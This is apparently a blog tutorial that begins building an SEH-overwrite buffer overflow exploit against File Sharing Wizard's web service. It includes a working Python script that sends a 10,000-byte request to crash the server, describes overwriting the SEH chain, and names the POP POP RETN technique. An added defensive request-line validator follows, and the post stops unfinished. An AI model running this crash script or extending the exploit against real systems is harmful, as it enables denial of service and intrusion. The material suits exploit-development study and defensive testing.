In this post I will try to develop an exploit for a buffer overflow in an application that has SafeSEH / SEH protection: File Sharing Wizard. It is not so different from the exploit I developed before (the local exploit), except that this application has protection against buffer overflows. OK, first, as usual, I will write a program that sends the first buffer so I can analyse what happens.
To know how to build the exploit we must sniff with Wireshark and see how the application assembles its requests, so that the buffer we send is one the application will accept. This time I found the application running on port 80, as you can see in the picture.
Now I will write the exploit the same way I wrote the exploit before:
#!/usr/bin/python
import socket

target_address = "192.168.4.44"
target_port = 80

# 10000 bytes of 'A' (0x41) used as the request target: enough to overrun the
# buffer the server copies the request line into
payload = "\x41" * 10000
buffer = "fuck %s HTTP/1.1\r\n\r\n" % payload

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer.encode())  # .encode() keeps this working on Python 3 as well
sock.close()
Now see what happens in File Sharing Wizard:
The application has crashed :D. OK, I will develop it further.
The application crashed, but EIP was not overwritten, because File Sharing Wizard has SEH: the exception raised by the overflow is dispatched through the SEH chain instead of returning into our buffer. To see the SEH chain, click the View menu and then SEH chain, as in the picture. The buffer we sent has landed in the SEH chain.
The solution for an application with an SEH chain is the POP POP RETN method.
Now I will build the buffer again; this time I will send a string of 10000 characters.
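As an added example (not from the original post or from File Sharing Wizard), here is the server-side check that would have prevented this crash: the first request line is bounded and validated before anything copies it into a fixed-size buffer. The limits, the `check_request_line` name and the 8190-byte cap (Apache's default LimitRequestLine) are my assumptions; `oversized_request` rebuilds the post's 10000-byte probe as constructed input.

```python
# Upper bounds for one request line (assumed values; 8190 is Apache's default
# LimitRequestLine and is used here as the overall cap)
MAX_REQUEST_LINE = 8190
MAX_METHOD = 16
ALLOWED_VERSIONS = {b"HTTP/1.0", b"HTTP/1.1"}


def check_request_line(raw):
    """Validate the first line of a raw HTTP request before any other handling.

    Returns (status, reason): status 0 means the line may be processed, any
    other value is the HTTP status the server should answer with instead.
    All limits are enforced on the raw bytes, so an over-long request target
    such as the 10000 'A's above never reaches a fixed-size buffer.
    """
    end = raw.find(b"\r\n")
    if end == -1:
        # No terminator yet: refuse if we have already read more than the cap
        if len(raw) > MAX_REQUEST_LINE:
            return 414, "Request-URI Too Long"
        return 400, "Bad Request"
    line = raw[:end]
    if len(line) > MAX_REQUEST_LINE:
        return 414, "Request-URI Too Long"
    parts = line.split(b" ")
    if len(parts) != 3:
        return 400, "Bad Request"
    method, target, version = parts
    if not (method.isalpha() and method.isupper()) or len(method) > MAX_METHOD:
        return 400, "Bad Request"
    if not target.startswith(b"/"):
        return 400, "Bad Request"
    if version not in ALLOWED_VERSIONS:
        return 505, "HTTP Version Not Supported"
    return 0, "OK"


def oversized_request(n=10000):
    # Constructed input mirroring the post's probe: n bytes of 'A' as the target
    return ("fuck /%s HTTP/1.1\r\n\r\n" % ("A" * n)).encode()
```

A server that reads at most MAX_REQUEST_LINE + 2 bytes and answers with the returned status never hands the oversized line to its request parser.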
To be continued.